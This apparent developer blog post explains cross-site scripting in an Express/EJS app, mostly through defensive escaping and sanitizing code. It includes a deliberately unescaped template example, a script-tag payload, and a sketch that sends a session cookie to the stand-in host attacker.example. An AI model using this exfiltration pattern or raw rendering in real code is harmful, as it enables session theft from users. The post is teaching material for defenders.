XSS aka HTML Injection Attack explained
Originally published at jamischarles.com.
TL;DR: XSS is about injecting unsafe JS into a page’s HTML, such as an alert(), usually passed by URL params.
Recently at work I needed to patch an app for an XSS vulnerability. I was doing research on XSS and came across this great thought (unfortunately I lost the link):
I wish we could rename XSS to HTML Injection Attack.
Why? Because that is what actually happens: an attacker injects HTML (usually a <script> tag) into your HTML, which is then executed.
How does this HTML Injection Attack work in practice?
Let’s say we have a node.js webapp. We’re running express.js and using ejs for our templating language.
We’re fetching the name URL param and injecting it into the EJS template.
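The setup can be approximated without any dependencies. The sketch below is a stand-in for the Express route and EJS template, not the app's actual code: renderGreetingUnsafe, the localhost base URL, and the sample value are hypothetical, and the raw string interpolation mimics what an unescaped <%- name %> tag outputs.

```javascript
// Dependency-free stand-in for the Express route + EJS template described above.
// renderGreetingUnsafe and the localhost base URL are hypothetical names.
function renderGreetingUnsafe(requestUrl) {
  // Read the name param from the query string, the way a route handler would.
  const params = new URL(requestUrl, "http://localhost:3000").searchParams;
  const name = params.get("name") ?? "";

  // Raw interpolation: the value lands in the HTML exactly as it was sent.
  return `<h1>Hello ${name}</h1>`;
}

console.log(renderGreetingUnsafe("/?name=World"));
// → <h1>Hello World</h1>
```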
With the following result:
So far so good. Nothing fishy going on here. Now let’s try to insert a <script> tag into the URL:
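Sounds like Chrome can see that this is likely an XSS attack, and blocked it. Great! Don’t rely on that, though: Chrome removed this filter (the XSS Auditor) in version 78, and Firefox never shipped one.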
How can this attack hurt me?
An alert box on a page is pretty harmless. So how could this actually hurt somebody?
Here’s how an attacker could use this to get access to your bank account.
- You’d receive an email with instructions to log into your bank.
- After login, you’re instructed to click on this link
When you log in, your bank’s web server starts a session for you (usually lasting 10–15 minutes, after which you are automatically logged out). The session information (usually called a token) is stored in a cookie on your computer.
If the hacker can get you to log in and then click the link he sent you, then maliciousCodeHere will run, and could send your session token to the hacker.
This allows him to steal your session. He could then (in theory) create a cookie on his computer and store your session information in it. If that session is still active, he can visit your bank’s website, and he’ll be logged in as you, and can browse around, look at bank account information, and possibly even initiate a transfer or change your password.
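To make the theft step concrete, here is a rough sketch of what maliciousCodeHere could boil down to. Everything in it is an assumption for illustration: attacker.example is a placeholder domain, buildExfiltrationUrl is a made-up helper, and the cookie value is fake. In a browser, the injected script would read document.cookie and request a URL like this one, which hands the token to the attacker's server.

```javascript
// Illustration only: attacker.example is a placeholder domain and
// buildExfiltrationUrl is a hypothetical helper, not code from a real attack.
function buildExfiltrationUrl(cookieString) {
  // The cookie is URL-encoded so it survives as a single query parameter.
  return "https://attacker.example/collect?c=" + encodeURIComponent(cookieString);
}

// In a browser the injected script would pass document.cookie here.
const fakeCookie = "session_token=abc123";
console.log(buildExfiltrationUrl(fakeCookie));
// → https://attacker.example/collect?c=session_token%3Dabc123
```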
How to protect against an HTML Injection Attack
The general rule is this:
Treat any user input as unsafe.
This means that we need to sanitize any user-provided values. There are a number of libraries that do that for you, so I won’t call any out specifically.
There are several places you could sanitize. In general you should sanitize on the server, because any client-side sanitization could be circumvented by an attacker.
Sanitizing at the templating layer
The most common place to sanitize is at the templating layer, and most templating languages have built-in support for this. In EJS, you use <%= name %> by default because it sanitizes by encoding any HTML tags, so any <script> tag will show up as &lt;script&gt; in the HTML and as a literal <script> tag on the webpage. This means it’ll be rendered as text and not executed. You are safe. In my attack example above I used <%- name %> instead of <%= name %>. <%- in EJS will render raw HTML that won’t be sanitized, and should thus be avoided with user input.
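The difference between the two tags can be sketched in plain JavaScript. The escapeHtml helper below is a hypothetical, simplified encoder written for this example; it is similar in spirit to what an escaping template tag does, but it is not EJS's own implementation.

```javascript
// Minimal HTML-encoding helper. escapeHtml is a hypothetical name,
// not the function EJS uses internally.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;") // must run first so later entities are not double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const userName = "<script>alert(1)</script>";

// Raw output, comparable to <%- name %>: the browser would execute this.
console.log(`<h1>Hello ${userName}</h1>`);
// → <h1>Hello <script>alert(1)</script></h1>

// Encoded output, comparable to <%= name %>: the browser shows it as text.
console.log(`<h1>Hello ${escapeHtml(userName)}</h1>`);
// → <h1>Hello &lt;script&gt;alert(1)&lt;/script&gt;</h1>
```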
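If you have your own templating solution or use ES6 template strings, you should sanitize your user values via some XSS library. At the very least you could strip out common XSS attack strings like <script> from the input, though stripping alone is easy to bypass (an <img> tag with an onerror attribute needs no <script> at all), so treat it as a last resort.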
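For ES6 template strings, one option is a tagged template that encodes every interpolated value automatically. This is a minimal sketch under that assumption: safeHtml and escapeHtml are hypothetical names, and a maintained XSS library would cover more cases than this hand-rolled encoder.

```javascript
// Hypothetical encoder, kept deliberately small for the example.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Tagged template: the literal chunks are trusted (the developer wrote them),
// the interpolated values are not, so only the values get encoded.
function safeHtml(strings, ...values) {
  return strings.reduce(
    (out, chunk, i) => out + chunk + (i < values.length ? escapeHtml(values[i]) : ""),
    ""
  );
}

const userName = "<script>alert(1)</script>";
console.log(safeHtml`<h1>Hello ${userName}</h1>`);
// → <h1>Hello &lt;script&gt;alert(1)&lt;/script&gt;</h1>
```

The appeal of this design is that forgetting to call the encoder is no longer possible: any value that goes through the tag is encoded by default.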
Sanitizing at the storage layer
If you are saving any values to a database (like URL names, or user names, or emails) that will be displayed to the user, this is a prime location for an HTML injection attack. If I can store <script>[maliciousCode]</script> as my display name for a social site, then anybody else who sees my name could potentially run my code in their browser and I can steal their credentials. Sanitizing before you save any values from user input is a must.
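Here is a small sketch of sanitizing before saving. It makes several assumptions: an in-memory Map stands in for the real database, and saveDisplayName and escapeHtml are hypothetical helpers rather than part of any particular library.

```javascript
// Hypothetical encoder, kept deliberately small for the example.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// In-memory Map standing in for a real database table (an assumption).
const displayNames = new Map();

// Encode the user-provided name before it is ever stored.
function saveDisplayName(userId, rawName) {
  const safeName = escapeHtml(String(rawName).trim());
  displayNames.set(userId, safeName);
  return safeName;
}

saveDisplayName(1, "<script>[maliciousCode]</script>");
console.log(displayNames.get(1));
// → &lt;script&gt;[maliciousCode]&lt;/script&gt;
```

One trade-off to keep in mind: a value encoded at save time should not be encoded a second time at render time, or visitors will see the entities literally.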
Sanitizing at the url param layer
This is my least favorite option, but you could add some middleware that sanitizes all the route parameters like so:
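A minimal sketch of such a middleware, assuming the Express-style (req, res, next) signature. The names sanitizeParams, sanitizeValues, and escapeHtml are hypothetical, and so is the req.sanitized property: the sketch stores encoded copies there instead of overwriting req.query or req.params, so it does not depend on whether the framework allows those to be reassigned.

```javascript
// Hypothetical encoder, kept deliberately small for the example.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Recursively encode every string in a plain value (query strings can nest).
function sanitizeValues(input) {
  if (typeof input === "string") return escapeHtml(input);
  if (Array.isArray(input)) return input.map(sanitizeValues);
  if (input !== null && typeof input === "object") {
    return Object.fromEntries(
      Object.entries(input).map(([key, value]) => [key, sanitizeValues(value)])
    );
  }
  return input; // numbers, booleans, null, undefined pass through unchanged
}

// Express-style middleware. req.sanitized is a property invented for this sketch.
function sanitizeParams(req, res, next) {
  req.sanitized = {
    query: sanitizeValues(req.query ?? {}),
    params: sanitizeValues(req.params ?? {}),
  };
  next();
}

// Exercise it with a fake request object instead of a running server.
const fakeReq = { query: { name: "<script>alert(1)</script>" }, params: {} };
sanitizeParams(fakeReq, {}, () => {});
console.log(fakeReq.sanitized.query.name);
// → &lt;script&gt;alert(1)&lt;/script&gt;
```

In an Express app this would typically be registered with app.use(sanitizeParams) before the routes. Route handlers would then read from req.sanitized rather than from the raw values.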
In summary, HTML Injection Attacks (XSS) are usually about injecting unsafe JS into the HTML (often via the URL) in order to get a victim to run that malicious JS in their browser to steal info they have access to because they’ve logged in.
Treat all user input as unsafe, and sanitize it.